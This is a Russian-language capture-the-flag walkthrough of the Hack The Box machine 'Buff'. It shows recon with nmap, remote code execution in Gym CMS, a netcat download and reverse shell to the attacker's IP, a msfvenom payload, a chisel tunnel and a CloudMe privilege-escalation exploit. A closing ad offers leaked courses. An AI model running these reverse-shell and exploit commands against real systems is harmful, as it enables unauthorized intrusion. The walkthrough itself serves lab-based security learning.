Hack The Box. Прохождение Buff. RCE в CMS Gym и в CloudMe

Опубликовано автором

Продолжаю публикацию решений, отправленных на дорешивание машин с площадки HackTheBox.

В данной статье эксплуатируем RCE в CMS Gym, строим туннель и повышаем привилегии через CloudMe.

Организационная информация

Чтобы вы могли узнавать о новых статьях, программном обеспечении и другой информации, я создал канал в Telegram и группу для обсуждения любых вопросов в области ИиКБ. Также ваши личные просьбы, вопросы, предложения и рекомендации рассмотрю лично и отвечу всем.

Вся информация представлена исключительно в образовательных целях. Автор этого документа не несёт никакой ответственности за любой ущерб, причиненный кому-либо в результате использования знаний и методов, полученных в результате изучения данного документа.

Recon

Данная машина имеет IP адрес 10.10.10.198, который я добавляю в /etc/hosts.

10.10.10.198 	buff.htb

Первым делом сканируем открытые порты. Я это делаю с помощью следующего скрипта, принимающего один аргумент — адрес сканируемого хоста:

#!/bin/bash ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -p$ports -A $1

На хосте открыто два порта.

Entry Point

Посмотрим, что нам даст веб сервер.

Находим версию CMS и можем посмотреть для нее эксплоиты.

Отлично, мы имеем RCE.

USER

Давайте пробросим удобный шелл. Запустим на локальной машине веб-сервер.

python3 -m http.server 9999

И загрузим на удаленную машину netcat.

curl 10.10.14.114:9999/nc64.exe -O .\nc.exe

Теперь запустим листенер и кинем реверс шелл.

.\nc64.exe -e cmd.exe 10.10.14.114 6543

ROOT

Проводим разведку на хосте и видим работающий от с повышенными привилегиями CloudMe.

Тоже посмотрим эксплоиты.

Нам нужно сгенерировать свою нагрузку в формате python. Сделаем это с msfvenom.

msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.114 9876' -b '\x00\x0A\x0D' -f py -v payload

Так нагрузка будет отправлена на 8888 порт.

Давайте сделаем туннель. Запустим сервер chisel на локальной машине.

./tools/chisel.bin server -p 56756 --reverse

И клиент на удаленной. 

.\chisel.exe client 10.10.14.114:56756 R:8888:127.0.0.1:8888

На локальной машине увидим успешное подключение.

Теперь все, что приходит на локальный порт 8888 транслируется на тот же порт удаленной машины.

Выполняем эксплоит и получаем реверс шелл с повышенными привилегиями.

python 48389.py

Вы можете присоединиться к нам в Telegram. Там можно будет найти интересные материалы, слитые курсы, а также ПО. Давайте соберем сообщество, в котором будут люди, разбирающиеся во многих сферах ИТ, тогда мы всегда сможем помочь друг другу по любым вопросам ИТ и ИБ.

ссылка на оригинал статьи https://habr.com/ru/post/529080/

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *